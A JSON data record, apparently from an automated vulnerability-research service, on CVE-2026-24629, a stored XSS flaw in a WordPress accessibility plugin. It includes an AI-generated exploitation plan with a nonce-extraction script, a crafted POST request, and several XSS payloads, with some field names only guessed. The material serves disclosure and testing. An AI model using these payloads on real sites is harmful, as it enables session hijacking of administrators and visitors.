[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXEqbZle_yfglNqeeqgmzzrSE19vTCD_8moscF4A4Vck":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":25,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":29},"CVE-2026-24629","web-accessibility-with-max-access-authenticated-administrator-stored-cross-site-scripting","Web Accessibility with Max Access \u003C= 2.1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting","The Web Accessibility with Max Access plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","accessibility-toolbar",null,"\u003C=2.1.0","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-09 15:52:32","2026-02-03 13:48:30",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F423e10b3-5b1d-4162-ade4-3f6d69a9703e?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-24629\n\n## 1. Vulnerability Summary\nThe **Web Accessibility with Max Access** plugin (\u003C= 2.1.0) is vulnerable to **Authenticated (Administrator+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize user-supplied configuration settings during storage and subsequently fails to escape those settings when rendering them on the site's frontend and backend. \n\nWhile administrators typically have the `unfiltered_html` capability in standard WordPress installs, this vulnerability is critical in **Multi-site** environments or installations where `DISALLOW_UNFILTERED_HTML` is defined as `true`, as it allows an administrator to bypass intended security restrictions and execute arbitrary JavaScript in the context of other users (including Super Admins).\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** Plugin settings page, typically handled via the WordPress Settings API (`wp-admin\u002Foptions.php`) or a custom AJAX\u002FPOST handler.\n*   **Vulnerable Parameter:** Likely configuration keys within the plugin's settings array (e.g., `max_access_settings`, `toolbar_label`, or `accessibility_statement`).\n*   **Authentication Level:** Administrator or higher.\n*   **Preconditions:** \n    1.  The plugin \"Web Accessibility with Max Access\" (slug: `accessibility-toolbar`) must be active.\n    2.  `unfiltered_html` must be disabled for the Administrator role (standard in Multisite or via `wp-config.php`).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point (Admin):** The administrator navigates to the settings page (likely `wp-admin\u002Fadmin.php?page=accessibility-toolbar-settings` or similar).\n2.  **Input Handling:** The plugin registers settings using `register_setting()`. If a `sanitize_callback` is missing or uses a weak function like `esc_attr` (which only escapes during rendering, not storage) or fails to use `wp_kses()`, the payload is stored in the `wp_options` table.\n3.  **Storage:** `update_option()` is called with the raw\u002Finsufficiently sanitized `$_POST` data.\n4.  **Sink (Frontend\u002FBackend):** The plugin uses `get_option()` to retrieve the malicious string. It is then echoed into the HTML of the site (often on every page where the accessibility toolbar appears) without using `esc_html()`, `esc_attr()`, or `wp_kses()`.\n    *   *Potential Sink Function:* `echo $options['toolbar_label'];` or similar inside a hook like `wp_footer`.\n\n## 4. Nonce Acquisition Strategy\nTo save settings, the plugin will require a WordPress nonce generated by `wp_nonce_field()`. \n\n1.  **Identify the Settings Page:** Determine the exact slug by running:\n    `wp admin menu list | grep \"Accessibility\"`\n2.  **Navigate and Extract:** Use the `browser_navigate` tool to go to the settings page as an Administrator.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` value from the settings form.\n    *   **JavaScript:** `document.querySelector('input[name=\"_wpnonce\"]').value`\n    *   **Action String:** If the plugin uses the Settings API, the action is usually the `option_group` name. If it's a custom handler, check for `check_admin_referer('action_name')`.\n\n## 5. Exploitation Strategy\nThe goal is to inject a script that will execute whenever the accessibility toolbar is loaded.\n\n**Step 1: Determine the Option Name**\nSearch the plugin code for the setting being saved:\n`grep -r \"register_setting\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Faccessibility-toolbar\u002F`\n\n**Step 2: Construct the Payload**\nWe will target a field likely rendered in the toolbar, such as a label or footer text.\n*   **Payload:** `\">\u003Cscript>alert(origin)\u003C\u002Fscript>`\n\n**Step 3: Submit the Request**\nUsing the `http_request` tool, simulate the form submission to `wp-admin\u002Foptions.php`.\n\n*   **URL:** `https:\u002F\u002F[TARGET]\u002Fwp-admin\u002Foptions.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    option_page=[OPTION_GROUP]&\n    action=update&\n    _wpnonce=[EXTRACTED_NONCE]&\n    [SETTING_NAME][field_key]=%22%3E%3Cscript%3Ealert(origin)%3C%2Fscript%3E\n    ```\n\n**Step 4: Trigger Execution**\nVisit the site frontend (any post or page) to trigger the XSS.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `accessibility-toolbar` is installed and active.\n2.  **Create Admin User:** Ensure an admin user exists.\n3.  **Disable Unfiltered HTML:** Add the following to `wp-config.php` to simulate the vulnerable environment:\n    `define( 'DISALLOW_UNFILTERED_HTML', true );`\n4.  **Ensure Settings Exist:** Navigate to the plugin settings once to ensure default options are populated in the database.\n\n## 7. Expected Results\n*   The POST request to `options.php` should return a `302 Redirect` back to the settings page with `settings-updated=true`.\n*   When viewing the site frontend, the HTML source should contain the unescaped payload: `value=\"\">\u003Cscript>alert(origin)\u003C\u002Fscript>\"` or simply `\u003Cdiv ...>\u003Cscript>alert(origin)\u003C\u002Fscript>\u003C\u002Fdiv>`.\n*   A browser alert box should appear showing the site's origin.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the payload is stored raw in the database:\n    `wp option get [SETTING_NAME] --format=json`\n2.  **Source Code Check:** Verify the frontend output:\n    `curl -s https:\u002F\u002F[TARGET]\u002F | grep \"alert(origin)\"`\n\n## 9. Alternative Approaches\n*   **Admin-side XSS:** If the payload doesn't render on the frontend, check the admin dashboard\u002Fsettings page itself. Stored XSS in the admin panel can be used to hijack Super Admin sessions in Multisite.\n*   **Shortcode Injection:** If the plugin uses a shortcode to display the toolbar, check if shortcode attributes are vulnerable:\n    `[max_access_toolbar label='\u003Cimg src=x onerror=alert(1)>']`\n*   **Bypass `sanitize_text_field`:** If `sanitize_text_field` is used, try attribute-based payloads that don't use `\u003C >` tags, such as:\n    `\" onmouseover=\"alert(1)` (if the output is inside an HTML attribute).","The Web Accessibility with Max Access plugin (\u003C= 2.1.0) is vulnerable to Stored Cross-Site Scripting (XSS) because it fails to sanitize and escape plugin settings during storage and output. This allows authenticated administrators to inject arbitrary JavaScript into settings that are rendered across the site, which is particularly critical in Multisite environments where administrators do not have the 'unfiltered_html' capability.","To exploit this vulnerability, an attacker with Administrator-level access must first identify a site where the 'unfiltered_html' capability is restricted (such as a Multisite environment or a site with DISALLOW_UNFILTERED_HTML enabled). The attacker navigates to the plugin's settings page to extract a valid WordPress nonce and the relevant option group name. They then submit a crafted POST request to \u002Fwp-admin\u002Foptions.php, injecting a script payload (e.g., \">\u003Cscript>alert(origin)\u003C\u002Fscript>) into a configuration field like the toolbar label or accessibility statement. The malicious script is saved in the database and executes whenever a user, including site visitors or super admins, loads a page where the plugin's toolbar or settings are rendered.","gemini-3-flash-preview","2026-05-05 12:25:04","2026-05-05 12:25:23",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faccessibility-toolbar\u002Ftags"]